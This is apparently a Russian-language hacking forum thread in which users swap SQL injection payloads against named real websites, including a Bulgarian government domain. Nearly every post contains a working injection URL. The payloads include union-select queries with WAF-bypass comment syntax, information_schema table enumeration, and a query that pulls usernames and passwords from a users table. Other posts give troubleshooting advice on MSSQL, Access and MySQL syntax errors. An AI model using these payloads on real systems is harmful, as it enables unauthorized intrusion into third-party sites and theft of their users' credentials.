WAF не дремлет... Code: http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat? есть способы обхода этой ошибки иле можно заменить limit както?
Пацаны, хелп, плиз ))) HTML: http://www.site.com/script.asp?id=1'+or+1=@@version-- Выдает: HTML: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'. /script.asp, line 17 Что за нах**?
Т.е екстрасенсы в отпуске Я написал то, что вижу, исходя из того, что ты дал Или иди статью читай, или линк давай
HTML: http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version-- Скромно, да? =)) P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
мб потому что это mssql?) мб потому что это access?) www.mlsp.government.bg/EIF/forum/reply.asp?id=-4+union+select+1,1,1,1,1,1,1,1,1,username%2b'<=>'%2bpassword,1,1,1,1,1+from+users
izvini a dalse kak budet ?? http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat(table_name)*/+from*/+information_schema.tables*/ ili kak ?? a mojet podrobnee voobse eto kakoy metod ??
LokbatanLi Например так http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
А есть какая-нибудь функция типа NAME_CONST??? В скрипте два запроса. Версия 5. NAME_CONST не работает
При попытки произвести SQl inj выводится ошибка, но "order by 12" съела, а union+select выдаёт ошибку Куда копать, если выдаёт такую ошибку ? Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1
